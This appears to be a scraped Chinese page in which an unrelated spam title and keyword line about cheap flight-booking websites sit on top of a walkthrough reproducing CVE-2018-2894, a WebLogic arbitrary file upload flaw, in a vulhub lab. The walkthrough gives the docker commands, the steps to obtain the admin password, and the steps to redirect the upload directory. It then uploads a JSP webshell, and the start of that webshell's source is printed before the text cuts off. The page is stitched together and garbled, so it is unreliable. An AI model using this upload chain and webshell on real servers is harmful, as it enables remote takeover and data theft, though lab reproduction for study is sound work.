如何在国内以较低成本建立专注于国外域名注册商的机票预订网站？

国外域名注册商网站,国内便宜机票网站建设,新塘做网站,店铺设计叫什么CVE-2018-2894 任意文件上传漏洞 漏洞影响 Weblogic受影响的版本#xff1a; 10.3.6.012.1.3.012.2.1.212.2.1.3 漏洞环境 此次我们使用的是vnlhub靶场搭建的环境#xff0c;是vnlhub中的Weblogic漏洞中的CVE-2018-2894靶场#xff0c;我们 cd 到 CVE-2018-2894#x…CVE-2018-2894 任意文件上传漏洞 漏洞影响 Weblogic受影响的版本 10.3.6.012.1.3.012.2.1.212.2.1.3 漏洞环境 此次我们使用的是vnlhub靶场搭建的环境是vnlhub中的Weblogic漏洞中的CVE-2018-2894靶场我们 cd 到 CVE-2018-2894然后输入以下命令启动靶场环境 docker-compose up -d输入以下的命令可以查看当前启动的靶场环境 docker-compose ps漏洞复现 我们首先通过以下的命令获取Weblogic后台登陆的用户名和密码 docker-compose logs | grep password然后我们通过URLhttp://IP:7001/console/login/LoginForm.jsp访问靶场界面 然后我们通过用户名weblogic和刚刚获得密码QghFSif4登陆Weblogic后台界面 如图是我们登陆后的界面 登录到后台我们按照登录 - base-domain -高级 - 开启 web测试页 - 保存的顺序开启 Web Service Test Page 然后我们输入以下的地址访问http:/IP:7001/ws_utc/config.doWeb测试页 然后我们修改工作目录为以下的路径 /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css然后点击提交 然后我们点击安全——添加 上传大马dama.jsp,设置名字dama点击提交 dama.jsp的代码内容如下 %page pageEncodingutf-8% %page importjava.io.*% %page importjava.util.*% %page importjava.util.regex.*% %page importjava.sql.*% %page importjava.nio.charset.*% %page importjavax.servlet.http.HttpServletRequestWrapper% %page importjava.text.*% %page importjava.net.*% %page importjava.util.zip.*% %page importjava.awt.*% %page importjava.awt.image.*% %page importjavax.imageio.*% %page importjava.awt.datatransfer.DataFlavor% %page importjava.util.prefs.Preferences% %!/*** JSP大马*/private static final String PW password; // 访问密码 passwordprivate static final String PW_SESSION_ATTRIBUTE JspSpyPwd;private static final String REQUEST_CHARSET ISO-8859-1;private static final String PAGE_CHARSET UTF-8;private static final String CURRENT_DIR currentdir;private static final String MSG SHOWMSG;private static final String PORT_MAP PMSA;private static final String DBO DBO;private static final String SHELL_ONLINE SHELL_ONLINE;private static String SHELL_NAME ;private static String WEB_ROOT